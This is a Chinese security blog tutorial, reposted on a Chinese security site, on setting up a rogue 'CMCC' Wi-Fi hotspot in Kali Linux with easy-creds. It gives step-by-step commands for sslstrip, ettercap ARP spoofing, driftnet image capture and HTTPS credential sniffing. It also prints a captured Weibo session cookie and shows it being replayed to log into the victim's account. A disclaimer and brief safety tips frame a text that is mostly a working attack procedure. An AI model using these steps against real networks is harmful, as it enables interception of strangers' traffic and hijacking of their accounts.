[实战]如何在Kali Linux中进行WIFI钓鱼?

admin 2022年4月14日07:38:01评论182 views字数 4145阅读13分49秒阅读模式

作者:雪碧0xroot@漏洞盒子安全团队

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

[实战]如何在Kali Linux中进行WIFI钓鱼?

0x00 实验环境

操作系统:Kali 1.0 (VM)

FackAP: easy-creds

硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)

[实战]如何在Kali Linux中进行WIFI钓鱼?

靶机:安卓、iPhone设备

0x01 环境搭建

git clone https://github.com/brav0hax/easy-creds cd easy-creds

[实战]如何在Kali Linux中进行WIFI钓鱼?

bash install.sh

[实战]如何在Kali Linux中进行WIFI钓鱼?

选择第一项:1.  Debian/Ubuntu and derivatives

[实战]如何在Kali Linux中进行WIFI钓鱼?

这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。

当看到提示happy hunting的时候便意味着安装完成了:

[实战]如何在Kali Linux中进行WIFI钓鱼?

0x02

根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:

2.1 修改etter uid、gid值 &开启iptables端口转发

kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)

[实战]如何在Kali Linux中进行WIFI钓鱼?

需要我们把ettercap的ec_uid、ec_gid的值修改为0:

[实战]如何在Kali Linux中进行WIFI钓鱼?

另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:

# if you use iptables:    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为:

# if you use iptables:    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 开启数据包转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 配置iptables规则:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  

2.4 运行sslstrip

sslstrip -l 8080

2.5 开启网络管理 &重启网络管理服务

vim /etc/NetworkManager/NetworkManager.conf

[实战]如何在Kali Linux中进行WIFI钓鱼?

将managed=false修改为managed=true:

[实战]如何在Kali Linux中进行WIFI钓鱼?

重启网络管理服务:

service network-manager restart

0x03 运行easy-creds

终端执行:easy-creds
选择第三项:FakeAP Attacks

[实战]如何在Kali Linux中进行WIFI钓鱼?

选择第一项:FakeAP Attack Static

[实战]如何在Kali Linux中进行WIFI钓鱼?

y确定包含sidejacking劫持攻击:

[实战]如何在Kali Linux中进行WIFI钓鱼?

下一步选择WIFI网络的流量入口:eth0

[实战]如何在Kali Linux中进行WIFI钓鱼?

选择无线网络接口&设备:wlan0

[实战]如何在Kali Linux中进行WIFI钓鱼?

设定WIFI-SSID:CMCC

[实战]如何在Kali Linux中进行WIFI钓鱼?

WIFI网络信道:5

[实战]如何在Kali Linux中进行WIFI钓鱼?

mon0

[实战]如何在Kali Linux中进行WIFI钓鱼?
n

[实战]如何在Kali Linux中进行WIFI钓鱼?
at0

[实战]如何在Kali Linux中进行WIFI钓鱼?
n

[实战]如何在Kali Linux中进行WIFI钓鱼?

为无线网络设置网段:192.168.88.0/24

[实战]如何在Kali Linux中进行WIFI钓鱼?

设定DNS服务器:8.8.8.8

[实战]如何在Kali Linux中进行WIFI钓鱼?

完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:

[实战]如何在Kali Linux中进行WIFI钓鱼?

红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。

0x04 Hacking for fun

4.1 “绵羊墙”

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

driftnet -i at0   (-i指定监听的网络接口)

[实战]如何在Kali Linux中进行WIFI钓鱼?

4.2 MITM中间人攻击

Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (通过ARP欺骗,监听192.168.88.0/24 网段所有主机通信流量)

[实战]如何在Kali Linux中进行WIFI钓鱼?

[实战]如何在Kali Linux中进行WIFI钓鱼?

4.3 利用Cookie登陆受害者账户

利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。

这里我使用了:Modify Headers for Google Chrome

[实战]如何在Kali Linux中进行WIFI钓鱼?

4.3.1 捕获到的微博Cookie数据:

Wed Jul 20 11:27:50 2016 TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP  GET /unread?t=1468985586846 HTTP/1.1. Host: m.weibo.cn. Connection: keep-alive. User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile. Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U. Accept: application/json, text/javascript, */*; q=0.01. X-Requested-With: XMLHttpRequest. Accept-Language: zh-cn. Referer: http://m.weibo.cn/. Accept-Encoding: gzip,deflate. .

4.3.2 清空浏览器内weibo.cn的Cookie:

[实战]如何在Kali Linux中进行WIFI钓鱼?

4.3.3 导入微博Cookie

选择右上角+ 增加Cookie:

Action=Modify 
Name=Cookie 
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

[实战]如何在Kali Linux中进行WIFI钓鱼?

[实战]如何在Kali Linux中进行WIFI钓鱼?

4.3.4 访问m.weibo.cn:

[实战]如何在Kali Linux中进行WIFI钓鱼?

0x05 嗅探数据包&协议分析

5.1 wireshark

[实战]如何在Kali Linux中进行WIFI钓鱼?

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 ssltrips嗅探https加密流量

捕获HTTPS通信传输中的账号、密码:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ssltrips -p -l 10000 -w log.txt

0x06 注意事项

1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)

[实战]如何在Kali Linux中进行WIFI钓鱼?

2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

当发现值为0的时候需再次执行:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;

0x07 安全建议

1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;

2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。

本文由 雪碧0xroot  投稿到“实战”专栏。点击阅读原文,可以跳转到他的个人站点。



玄魂工作室微信订阅号正式推出实战栏目,旨在帮助入门同学提升动手能力,拓展思维。由于创作能力有限,面向所有订阅号读者征稿。如有意愿,订阅号留言,或者邮件[email protected]皆可。

问题讨论,加请求群:Hacking (1群):303242737   Hacking (2群):147098303。


微信扫码关注订阅号,回复“实战”,查看系列文章。



[实战]如何在Kali Linux中进行WIFI钓鱼?
玄魂工作室,精彩不断

Fluxion 实战答疑

实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解

Python灰帽编程 3.1 ARP欺骗

Python灰帽编程 3.3 MAC洪水

征稿,网络安全实战类文章

实战-如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓

原文始发于微信公众号(玄魂工作室):[实战]如何在Kali Linux中进行WIFI钓鱼?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月14日07:38:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [实战]如何在Kali Linux中进行WIFI钓鱼?http://cn-sec.com/archives/783573.html

发表评论

匿名网友 填写信息